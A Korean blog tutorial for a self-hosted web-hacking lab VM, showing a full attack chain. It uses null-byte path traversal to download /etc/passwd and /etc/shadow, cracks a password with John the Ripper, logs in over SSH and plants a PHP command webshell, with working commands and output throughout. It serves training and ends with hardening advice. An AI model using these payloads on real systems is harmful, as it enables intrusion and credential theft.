WH-PathTrav-01 라이브 ISO: 파일 다운로드 취약점으로 서버 침투

홈페이지 취약점 분석 이야기	파일 지도 사진 깨알

• 길찾기(sitemap) (20161109)

• 웹취약성분석 관련 파일 목록 (20161108)

• SQL 인젝션 공격도구 sqlmap의 간단한 사용법 (20161107)

• 웹취약점 분석 도구로서의 THC Hydra (20161107)

• 웹취약점 분석 도구로서의 cURL (20161107)

• [웹해킹훈련장] CVE-2014-6271: Bash Shellshock 실습 설명서 (20161104)

• [PentesterLab] CVE-2014-6271 Shellshock 훈련장 웹취약점 분석 보고서 (20161106)

• 무료 웹해킹 교육장 목록 (20161103)

• 칼리 리눅스(Kali Linux) 설치 (20161030)

• 가상머신 버추얼 박스(VirtualBox) 설치 (20161029)

• 가상머신 VMWare Workstation Player 설치 (20161028)

• [웹해킹훈련장] Drunk Admin Web Hacking Challenge 실습 설명서 (20161027)

• 스마트에디터(SmartEditor) 2.0 Basic의 웹쉘 업로드 취약점 (20160719)

<< 목록숨기기
#웹해킹 훈련장 #Live ISO #웹해킹 실습 #실습설명서 #WH-PathTrav-01 #경로조작 #Path Traversal #파일다운로드 취약점 #널문자삽입 #Null-byte Injection #/etc/passwd #/etc/shadow #무작위대입공격 #John the Ripper #A5-Security Misconfiguration #A4-Insecure Direct Object References

WH-PathTrav-01 경로조작 웹해킹훈련장 실습 설명서

WH-PathTrav-01 훈련장은 특정 상황에서는 경로조작(Path Traversal) 취약점이 매우 위험할 수 있다는 것을 실습하는 웹해킹 실습이다. 실제 취약점 점검 작업에서 발견되었으며, 해당 누리집은 Apache 웹서버와 Apache Tomcat 기반의 서비스였다. 다만 여기서는 PHP 기반으로 당시의 상황을 일부 재구성하였다.

WH-PathTrav-01 훈련장 환경 구성

다음 ISO 파일을 다운로드 받아서 주인 운영체제 내의 적당한 위치에 저장한다.

WH-PathTrav-01 웹취약점 훈련장의 Live ISO 파일 (wh-pathtrav-01.iso) (25.2MB)

VMWare Workstation Player를 이용하여 가상머신의 손님 운영체제로 라이브 ISO를 부팅한다. 손님 OS의 메모리 용량은 512MB 이상이면 된다. 부팅이 끝나면 또다른 가상머신인 Kali Linux에서 nmap으로 IP주소를 확인한다.

root@kali:~# ifconfig 
eth0: flags=4163  mtu 1500
        inet 192.168.206.129  netmask 255.255.255.0  broadcast 192.168.206.255
        inet6 fe80::20c:29ff:fe10:d108  prefixlen 64  scopeid 0x20
        ether 00:0c:29:10:d1:08  txqueuelen 1000  (Ethernet)
        RX packets 151935  bytes 102097270 (97.3 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 138066  bytes 44650715 (42.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10
        loop  txqueuelen 1  (Local Loopback)
        RX packets 12639  bytes 69445687 (66.2 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12639  bytes 69445687 (66.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@kali:~# nmap 192.168.206.1/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-16 10:03 KST
Nmap scan report for 192.168.206.1
Host is up (0.00014s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.206.2
Host is up (0.000080s latency).
All 1000 scanned ports on 192.168.206.2 are closed
MAC Address: 00:50:56:F4:54:02 (VMware)

Nmap scan report for 192.168.206.137
Host is up (0.00018s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:AD:C0:D8 (VMware)

Nmap scan report for 192.168.206.254
Host is up (0.000066s latency).
All 1000 scanned ports on 192.168.206.254 are filtered
MAC Address: 00:50:56:F1:82:26 (VMware)

Nmap scan report for 192.168.206.129
Host is up (0.0000030s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE
111/tcp open  rpcbind

Nmap done: 256 IP addresses (5 hosts up) scanned in 8.76 seconds
root@kali:~#

위와 같이 칼리리눅스와 동일한 C-클래스 대역을 스캔하면 192.168.206.137을 확인할 수 있다. 192.168.206.1과 192.168.206.2는 주인OS의 VMware Workstation이 사용하는 주소이다. 그리고 192.168.206.129는 칼리리눅스의 IP 주소이다.

wh-pathtrav-01: homepage
[ ↑ WH-PathTrav-01 훈련장: 홈페이지]

위의 그림은 wh-pathtrav-01.iso를 손님 OS로 부팅 후에 칼리 리눅스의 FireFox로 접속한 화면이다. nmap으로 확인한 WH-PathTrav-01 훈련장의 IP주소는 192.168.206.137였다. 이 누리집은 이미지 파일을 올릴 수 있는 기능을 제공하고 있다.

칼리 리눅스에서 nmap, nikto, owasp-zap으로 서버와 홈페이지에 취약점이 존재하는 지 탐색해보자.

nmap 스캔 결과

root@kali:~# nmap -A 192.168.206.137

Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-16 10:12 KST
Nmap scan report for 192.168.206.137
Host is up (0.00028s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     Dropbear sshd 2011.54 (protocol 2.0)
| ssh-hostkey: 
|   1024 20:41:f9:78:e9:16:c4:e6:de:89:67:a8:57:23:48:bc (DSA)
|_  1039 f4:2f:9a:a0:6d:cc:b3:2d:64:88:0d:99:8e:96:71:70 (RSA)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: \xEC\x9D\xB4\xEB\xAF\xB8\xEC\xA7\x80 \xEC\xB0\xBD\xEA\xB3\xA0 ::: \xEC\x9B\xB9\xED\x95\xB4\xED\x82\xB9/\xEC\x9B\xB9\xEC\xB7\xA8\xEC\x95\xBD\xEC\xA0\x90\xEB\xB6\x84\xEC\x84\x9D
MAC Address: 00:0C:29:AD:C0:D8 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.36 - 2.6.37
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms 192.168.206.137

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.39 seconds
root@kali:~#

nmap 점검 결과에서, WH-PathTrav-01 훈련장의 운영체제는 리눅스(커널 2.6.X)이다. 80 포트에서 Apache httpd를 이용하여 웹 서비스를 제공하고 있으며 22 포트에서는 Dropbear sshd를 통해 SSH 로그인을 허용하고 있는 것을 파악할 수 있다. 특별한 취약점은 발견되지 않았다.

nikto 스캔 결과

root@kali:~# nikto -host 192.168.206.137
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.206.137
+ Target Hostname:    192.168.206.137
+ Target Port:        80
+ Start Time:         2017-01-16 10:13:37 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ 7535 requests: 0 error(s) and 1 item(s) reported on remote host
+ End Time:           2017-01-16 10:13:45 (GMT9) (8 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#

nikto 점검 결과에서는 특이사항이 없다.

OWASP-ZAP 점검 결과

wh-pathtrav-01: zaproxy quick start result
[ ↑ WH-PathTrav-01 훈련장: OWASP-ZAP 빠른시작 점검 결과 ]

OWASP-ZAP의 "빠른 시작"을 이용한 점검 결과에서는 아무런 취약점이 발견되지 않았다.

nmap, nikto, owasp-zap 등과 같은 공개용 취약점 점검도구로는 별다른 취약점을 찾을 수 없었다. 다만, SSH 접속이 가능함을 염두에 두자(이렇게 서버의 22번 포트가 개방되어 있으면 22번 포트에 대한 SSH 무작위대입공격이 빈번하게 발생하며, root의 비밀번호가 취약할 경우에는 Xor DDoS 봇넷의 좀비서버로 장악당할 위험이 있다).

수동점검

홈페이지에서 제공하는 모든 URL을 보면

http://192.168.206.137/
http://192.168.206.137/upload.jsp (이미지 업로드 기능)
http://192.168.206.137/download.jsp?id=469b629e1f981ee7f604fdad7fda32b3 (원본파일이름: 1484383192-m.jpg)
http://192.168.206.137/download.jsp?id=49284e54856de9554c055e0af9e54043 (원본파일이름: 1484190058-m.jpg)
http://192.168.206.137/download.jsp?id=2d2a9e75f8607137a664d553412be3bf (원본파일이름: 1484105381-m.jpg)

등이 발견된다. 사용자가 이미지를 업로드할 수 있으며(upload.jsp), 서버에 저장된 이미지는 별도의 내려받기 기능(download.jsp)을 이용하여 서비스에 활용하고 있다.

JSP 웹쉘에 "jpg" 확장자만 덧붙여서, devshell.jsp.jpg 파일을 업로드하였다.

wh-pathtrav-01: devshell.jsp.jpg upload
[ ↑ WH-PathTrav-01 훈련장: devshell.jsp.jpg 업로드 결과 ]

devshell.jsp.jpg 파일을 업로드한 결과는 위와 같다. 이 파일은 평문 파일이기 때문에 이미지로 표시되지 않는 것을 볼 수 있다. HTML에 표현된 해당 이미지(사실은 텍스트 파일)의 src 속성은

<img width="150" src="download.jsp?id=6d46780764400b520a838f3b7adc4411">

이다. 이 이미지를 firefox로 직접 연결하면

firefox http://192.168.206.137/download.jsp?id=6d46780764400b520a838f3b7adc4411

파일을 "64a73ef88cf669029a629ac2930a48fc.jpg"로 저장할 지 여부를 묻는다.

확장자 처리에 대해서 살펴보기 위해 kth.jPG 파일을 올렸다. 이 파일은

http://192.168.206.137/download.jsp?id=7c15e4ae99dca253a6ec02c765ba698e

에서 다운로드받을 수 있다. 이 URL의 HTTP 헤더를 살펴보자.

root@kali:~# curl -I http://192.168.206.137/download.jsp?id=7c15e4ae99dca253a6ec02c765ba698e
HTTP/1.1 200 OK
Date: Mon, 16 Jan 2017 13:21:16 GMT
Server: Apache
X-Frame-Options: DENY
X-XSS-Protection: 1
X-Content-Type-Options: nosniff
Pragma: public
Expires: 0
Content-Disposition: attachment; filename="7c15e4ae99dca253a6ec02c765ba698e.jpg"
Content-Transfer-Encoding: binary
Content-Length: 29350
Content-Type: application/octet-stream

root@kali:~#

서버가 전달하는 파일이름은 소문자 jpg로 변경된 것을 볼 수 있다. 물론 7c15e4ae99dca253a6ec02c765ba698e.jpg가 서버에 저장되어 있는 실제 파일 이름이라는 것을 확신할 수 는 없다. 하지만 대부분의 개발자는 구현 과정에서 일종의 "깔맞춤"을 하기 때문에 소문자로 변경할 가능성이 높다. 파일의 크기는 29350로 업로드한 원본 파일의 크기와 동일하였다.

다양한 확장자를 가지는 파일을 업로드하였으나, 대소문자를 구분하지 않고 확장자가 jpg인 경우에만 업로드가 허용되었다. 그리고 실제 파일의 서버 내 경로를 파악하기는 어려웠다. 이미지 업로드 기능(upload.jsp)을 이용하여 웹쉘을 업로드할 수 있는 취약점은 없는 것으로 보인다.

사진설명과 원본 파일 이름이 홈페이지에 출력되기 때문에 HTML을 입력하였으나 작은 부등호(<)를 모두 <로 치환하여 적절하게 방어하고 있다. 크로스사이트스크립트(XSS) 취약점은 찾기 어렵다.

wh-pathtrav-01: XSS test
[ ↑ WH-PathTrav-01 훈련장: 사진설명과 파일이름의 HTML삽입 시험 ]

위의 화면은 HTML 삽입을 시험한 결과이다. 부등호와 스크립트가 실행되지 않고 화면에만 출력되는 것을 볼 수 있다. HTML삽입 취약점이 존재하지 않는다.

이제 파일 내려받기 기능(download.jsp)을 점검해보자. id 변수를 작은따옴표(')로 치환하여 서버의 응답을 살펴보자.

root@kali:~# curl -I http://192.168.206.137/download.jsp?id=%27
HTTP/1.1 200 OK
Date: Mon, 16 Jan 2017 10:26:34 GMT
Server: Apache
X-Frame-Options: DENY
X-XSS-Protection: 1
X-Content-Type-Options: nosniff
Pragma: public
Expires: 0
Content-Disposition: attachment; filename="'.jpg"
Content-Transfer-Encoding: binary
Content-Type: application/octet-stream

root@kali:~#

위에서는 id 변수가 웹 브라우저로 전달하는 파일이름에 포함된 것을 볼 수 있다.

파일 다운로드 기능에서 주로 취약점이 발생하는 이유는 사용자의 입력값을 접근할 파일의 경로 구성에 사용할 때이다. 만약 id 변수 값이 실제 파일 저장경로에 사용되었다면 취약점이 발생할 소지가 있다. 특히 널문자삽입(Null-byte Injection) 취약점이 있을 경우에는 공격자가 원하는 파일을 다운로드할 있게 되는 경우가 많다.

널문자삽입(Null-byte Injection)이 발생하면 공격자가 원하는 지점에서 문자열의 끝을 지정할 수 있다. 이는 거의 모든 프로그래밍 언어에서 문자열의 끝을 null(\0, 0x00, %00)로 표시하기 때문이다. 최근의 ASP, JSP, PHP에서는 발생하지 않으나 구축된지 수년이 지난 누리집에서 종종 발견되는 취약점이다. 주로 파일의 경로를 다룰 때 발생한다.

Null-byte Injection이 가능한 지 살펴보자. id 변수에 test%00test를 입력하여 서버의 응답을 살펴본다.

root@kali:~# curl -I http://192.168.206.137/download.jsp?id=test%00test
HTTP/1.1 200 OK
Date: Mon, 16 Jan 2017 16:25:22 GMT
Server: Apache
X-Frame-Options: DENY
X-XSS-Protection: 1
X-Content-Type-Options: nosniff
Pragma: public
Expires: 0
Content-Disposition: attachment; filename="test
Content-Transfer-Encoding: binary
Content-Type: application/octet-stream

root@kali:~#

정상적인 반응이라면 서버에서 filename="test%00test.jpg"를 반환하여야 한다. 그런데 %00 이후가 사라지고 filename="test만을 확인할 수 있다. 비정상적이다. 개발자가 %00 입력을 별도로 처리하는 기능을 구현하지는 않았을 것이다. 널문자삽입 취약점이 있을 것으로 추정할 수 있다.

리눅스/유닉스 계열의 서버에서 경로조작 취약점을 점검할 때는 충분한 ../을 붙여서 /etc/passwd 파일 접근을 시도한다. 그리고 널문자삽입이 가능한 것으로 보이기 때문에 파일이름의 끝에 %00을 붙인다. 예를 들어 ../../../../../../../../../etc/passwd%00과 같다. 리눅스/유닉스에서는 ../의 갯수가 충분하기만 하면 파일 시스템의 루트경로(/)가 된다.

root@kali:~# curl http://192.168.206.137/download.jsp?id=../../../../../../../etc/passwd%00
root:x:0:0:Root Administrator:/root:/bin/sh
nobody:x:99:99:Unprivileged User:/dev/null:/bin/false
www:x:80:80:Web Server User:/var/www:/bin/false
tux:x:1000:1000:Linux User,,,:/home/tux:/bin/sh
mysql:x:100:101:Linux User,,,:/home/mysql:/bin/false
webmaster:x:1001:1001:Linux User,,,:/home/webmaster:/bin/sh
root@kali:~#

id 변수에 ../../../../../../../etc/passwd%00를 전송했을 때 download.jsp는 /etc/passwd 파일 값을 전송하였다. 경로조작(Path Traversal) 취약점이 존재함을 확인할 수 있다. 경로조작 취약점 중에서 이처럼 임의의 파일을 다운로드할 수 있는 경우를 파일다운로드 취약점이라고도 한다.

리눅스 운영체제에서 계정 정보를 저장하는 파일은 /etc/shadow이다. 이 파일은 대개의 경우 root만이 읽을 수 있다. 혹시 이 파일을 열람할 수 있는 지 확인한다.

root@kali:~# curl http://192.168.206.137/download.jsp?id=../../../../../../../etc/shadow%00
root:$1$AWZJh37l$LuiYbuFM1KSFTk.s0BawD/:17186:0:99999:7:::
nobody:*:13509:0:99999:7:::
www:*:13509:0:99999:7:::
tux:$1$DoeNhd4i$KsGdikH.BeAXC.DVzvKc71:17186:0:99999:7:::
mysql:!:17135:0:99999:7:::
webmaster:$1$DP9ynR4O$N/NZSK2w7UT.cCFl3sv8X0:17186:0:99999:7:::
root@kali:~#

/etc/shadow 파일이 다운로드 되었다. WH-PathTrav-01 훈련장의 웹서버가 root에 준하는 권한을 가지고 실행중임을 알 수 있다. 이 파일을 열람할 수 있으면 웹 서버의 모든 계정의 비밀번호를 - 이론적으로는 - 역으로 연산할 수 있다. 이 때 가장 많이 사용하는 비밀번호 공격도구는 John the Ripper이다. /etc/shadow 파일의 복사본을 칼리에 저장하고 John the Ripper로 비밀번호를 공격해보자.

root@kali:~# curl http://192.168.206.137/download.jsp?id=../../../../../../../etc/shadow%00 -o etc-shadow
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   261  100   261    0     0   110k      0 --:--:-- --:--:-- --:--:--  254k
root@kali:~# time john etc-shadow
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyou         (webmaster)
1g 0:00:51:09  3/3 0.000325g/s 24041p/s 48079c/s 48079C/s aybjbg..aybjmb
1g 0:02:26:23  3/3 0.000113g/s 24162p/s 48324c/s 48324C/s mani155..mani182
1g 0:04:34:42  3/3 0.000060g/s 23768p/s 47535c/s 47535C/s r1j1jf..r1j1tj
^c
1g 0:06:17:01  3/3 0.000044g/s 23792p/s 47584c/s 47584C/s pp1i$21..pp1i$2u
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

real	377m1.924s
user	374m43.868s
sys	0m18.536s
root@kali:~#

위에서는 WH-PathTrav-01 훈련장의 /etc/passwd 파일을 etc-shadow로 저장하고 John the Ripper(john 명령어)로 무작위대입 공격을 시도하였다. 명령어 실행을 하면 곧바로 webmaster 계정의 비밀번호가 확인된다(iloveyou). 6시간 17분동안 계속 실행하였으나 root와 tux 계정의 비밀번호는 알아내지 못했다. John the Ripper가 6시간 17분 째에 게산하고 있던 비밀번호는 pp1i$21..pp1i$2u로 7자리 대역인 것을 알 수 있다. 고성능 컴퓨터와 어느 정도 시간이 주어진다면 8~9자리의 비밀번호는 1주일 이내에 알아낼 수 있을 것으로 보인다.

webmaster:iloveyou 계정정보를 이용하여 WH-PathTrav-01 서버(192.168.206.137)에 접속해보자.

root@kali:~# ssh webmaster@192.168.206.137
The authenticity of host '192.168.206.137 (192.168.206.137)' can't be established.
RSA key fingerprint is SHA256:CUew8TTFK52RQcHnSBjXaOXH7lLGe6wO/WUkn1Svauw.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.206.137' (RSA) to the list of known hosts.

Secure login on SliTaz GNU/Linux powered by Dropbear SSH server.
webmaster@192.168.206.137's password: iloveyou[Enter]

  Welcome to the Open Source World!
  
  SliTaz GNU/Linux is distributed in the hope that it will be useful,
  but with ABSOLUTELY NO WARRANTY.

webmaster@slitaz:~$ ls
arsenal/     public_html/
webmaster@slitaz:~$ cd public_html/
webmaster@slitaz:~/public_html$ ls
download.jsp  files/        index.jsp     style.css     upload.jsp
webmaster@slitaz:~/public_html$ cat download.jsp
<?php
$filepath = 'files/'.$_GET['id'].'.jpg';
$filesize = filesize($filepath);

header("Pragma: public");
header("Expires: 0");
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=\"".$_GET['id'].".jpg\"");
header("Content-Transfer-Encoding: binary");
header("Content-Length: $filesize");
ob_clean();
flush();
readfile($filepath);
?>
webmaster@slitaz:~/public_html$ cat "<?php system(\$_GET['cmd'])?>" > cmd.jsp
webmaster@slitaz:~/public_html$ cat cmd.jsp
<?php system($_GET['cmd'])?>
webmaster@slitaz:~/public_html$ exit
Connection to 192.168.206.137 closed.
root@kali:~#

위에서는 칼리리눅스에서 훈련장으로 SSH를 통해 webmaster으로 접속하였다.

이 취약점이 발견된 실제 서비스에서는 SSH가 외부에서는 접속이 불가능하였다. 방화벽에 의해서 막혀있는 상태였다. 그런데 출입구의 고객응접실에 WIFI가 제공되고 있었다. 이 WIFI는 기관 내부 PC와 동일한 대역의 IP주소를 NAT 주소로 사용하고 있었다. 휴게실에서 스마트폰의 터미널로 해당 웹서버에 접속할 수 있었으며, 위와 같은 작업을 진행할 수 있었다.

웹 서버에 webmaster 계정으로 접속했을 때 이 계정이 홈페이지 운영 계정인 것을 알 수 있다. 따라서 웹쉘을 직접 생성하거나 wget, ftp 등으로 등록할 수 있었다. 여기에서는 간단한 웹쉘을 만들었다. 그리고 서버 접속을 끊는다.

실제 이 취약점이 발견된 웹 서비스는 Apache Tomcat 기반의 서비스였다. 이 훈련장은 Apache 웹 서버로 재구성하여 실제로는 PHP 기반의 서비스여서 웹쉘은 PHP 코드를 사용한다.

칼리리눅스의 curl 명령어를 이용하여 위에서 만든 cmd.jsp 웹쉘에 접속해보자.

root@kali:~# curl 192.168.206.137/cmd.jsp?cmd=pwd
/home/webmaster/public_html
root@kali:~# curl 192.168.206.137/cmd.jsp?cmd=uname+-a
Linux slitaz 2.6.37-slitaz #2 SMP Wed Mar 7 10:36:39 CET 2012 i686 GNU/Linux
root@kali:~# curl 192.168.206.137/cmd.jsp?cmd=id
uid=80(www) gid=0(root) groups=0(root)
root@kali:~#

운영체제 명령어가 실행되는 것을 볼 수 있다. 리눅스의 id 명령의 결과가 uid=80(www) gid=0(root) groups=0(root)이다. 이는 웹서버 실행 권한을 의미한다. 그룹 이후의 권한이 root이다. 이 때문에 /etc/passwd 파일을 웹 서버가 읽을 수 있었던 것이다. 이제 공격자는 root의 비밀번호를 알지 못해도 - 원격에서 웹 접속을 통해 - 일부 root 권한을 가지게 된다.

이 취약점이 실제로 발견된 서버는 Apache + Apache Tomcat의 서비스 환경을 가지고 있었다. Apache 웹서버는 uid=80(www) 권한이었으며, Apache Tomcat WAS 서버는 uid=0(root) 권한으로 실행되고 있었다. 공격자는 SSH를 통해 서버에 접속할 때는 일반 계정(webmaster)의 권한을 가지지만, JSP 웹쉘을 이용하게 되면 원격에서도 root 권한을 탈취할 수 있게 된다.

웹서버나 WAS 서버가 root 또는 nt system 권한으로 실행되는 사례를 종종 볼 수 있다. 대부분의 경우, MS Windows + Apache Tomcat, Linux/Unix + Apache Tomcat, 또는 MS Windows + Apache + PHP 등의 웹 서비스 환경이다. Administrator/root 권한을 가져야 이러한 웹서버나 WAS 서버를 설치하기 편리하기 때문인 것으로 보인다. 하지만 이 사례에서 볼 수 있듯이 웹 애플리케이션이 취약할 때는 웹 만으로도 서버 장악이 가능하기 때문에 웹서버/WAS서버를 Administrator/root 권한으로 실행하는 것은 지양하는 것이 안전하다.

[처음 작성한 날: 2017.01.16] [마지막으로 고친 날: 2017.01.16]

> 이 글을 목록없이 인쇄하기 편하게 보기

< 이전 글 : 오늘의 웹서버 공격 로그: 워드프레스 취약점 자동탐색 도구 (2017.01.18)

> 다음 글 : WH-Webshell-Loc-01 라이브 ISO: 서버 내 웹쉘 저장경로 알아내기 (2017.01.14)

이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다.
잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다.
문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문